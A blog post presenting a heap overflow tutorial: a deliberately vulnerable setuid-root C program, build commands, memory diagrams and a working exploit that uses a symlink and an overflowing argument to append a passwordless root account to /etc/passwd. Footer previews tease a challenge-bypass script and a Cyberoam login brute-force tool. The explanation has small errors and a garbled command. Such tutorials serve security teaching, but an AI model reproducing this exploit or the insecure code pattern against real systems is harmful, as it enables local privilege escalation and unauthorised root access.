Skip to main content

HEAP OVERFLOW





#include<stdio.h>
#include<strings.h>


int main(int argc, char *argv[])
{
FILE  *filed;
char *userinput = malloc(20);
char *outputfile = malloc(20);


if (argc != 2)
{
printf("Usage: %s \n", argv[0]);
exit(0);
}


strcpy(outputfile, "/tmp/notes");
strcpy(userinput, argv[1]);



printf("userinput @ %p: %s\n", userinput, userinput);
printf("outputfile @ %p: %s\n",outputfile, outputfile);


filed = fopen(outputfile, "a");
if(filed == NULL)
{
fprintf(stderr, "error opening file %s\n", outputfile);
exit(1);
}


fprintf(filed, "%s\n", userinput);
fclose(filed);
return 0;
}


Building the code
 # gcc -o heap-overflow heap-overflow.c
 # chown root.root heap-overflow
 # chmod u+s heap-overflow
 # ./heap-overflow InformationSecurity
 userinput @ 0x80498d0: InformationSecurity
 outputfile @ 0x80498e8: /tmp/notes
 #cat /tmp/notes
 InformationSecurity

 # ./heap-overflow Hacker
 userinput @ 0x80498d0: Hacker
 outputfile @ 0x80498e8: /tmp/notes
 #cat /tmp/notes
 InformationSecurity
 Hacker

 KeyPoints:
 the distance between userinput and outputfile on the heap is 24 bytes!!
 And We have Allocated userinput first but copied over outputfile first.


Input of 24 byte.(exactly 25 byte as string terminator will be added)
# ./heap-overflow123456789012345678901234
userinput @ 0x80498d0: 123456789012345678901234
outputfile @ 0x80498e8: /tmp/notes error opening

 [ 0 ] <----- userinput
 [ 1 ]
 [ 2 ]
 [ 3 ]
   .
   .
   .
 [ 4 ]
 [ /0] <------ outputfile(/ is overwritten with '/0')
 [ t ]
 [ m ]
 [ p ]
 [ / ]
 [ n ]
 [ o ]
 [ t ]
 [ e ]
 [ s ]
 [ /0 ]

Question:How to exploit this ??
Ans:
# mkdir /tmp/etc
# ln -s /bin/bash /tmp/etc/passwd
# ./heap-overflow rooted::0:0:m:/root:/tmp/etc/passwd

Now this Will create a rooted name user with root power  and /bin/bash shell  but without any password.



Comments

Popular posts from this blog

Assignment 01(Enroll TO Offensive-Security Course)

Steps 1:download the page.
2:open fc4.js in your favourite editor and add following lines in it or just replace it with vode given below.
3:then open the download html file in browser and fill the form with your email and a garbage value string.
4:thats it? it will show you the real security string??
yeah but  ...theirs another challenge waiting for you ... :D

function fc4me(srvstr) {

   if(!document.pleazfc4me.email.value || !document.pleazfc4me.securitystring.value) {
      alert("Please fill in all the required fields!");
      return false;
   }
   else {
      document.pleazfc4me.submit();
    }
   var t=hexMD5("\x74\x72\x79\x68\x61\x72\x64\x65\x72"+srvstr)
alert(t)
document.write(t)
}



Finally Got In :-)

Cyberoam Login Brute Force Script

#
#  ('-.               .-') _                         ) (`-.               _  .-')
#  ( OO ).-.          (  OO) )                         ( OO ).            ( \( -O )
#  / . --. / ,--.     /     '._     ,------.,--. ,--. (_/.  \_)-.  .----.  ,------.
#  | \-.  \  |  |.-') |'--...__) ('-| _.---'|  | |  |  \  `.'  /  /  ..  \ |   /`. '
#.-'-'  |  | |  | OO )'--.  .--' (OO|(_\    |  | | .-') \     /\ .  /  \  .|  /  | |
# \| |_.'  | |  |`-' |   |  |    /  |  '--. |  |_|( OO ) \   \ | |  |  '  ||  |_.' |
#  |  .-.  |(|  '---.'   |  |    \_)|  .--' |  | | `-' /.'    \_)'  \  /  '|  .  '.'
#  |  | |  | |      |    |  |      \|  |_) ('  '-'(_.-'/  .'.  \  \  `'  / |  |\  \
#  `--' `--' `------'    `--'       `--'     `-----'  '--'   '--'  `---''  `--' '--'
# Cyberaom brute force Script
# @aut…

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8.
Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv…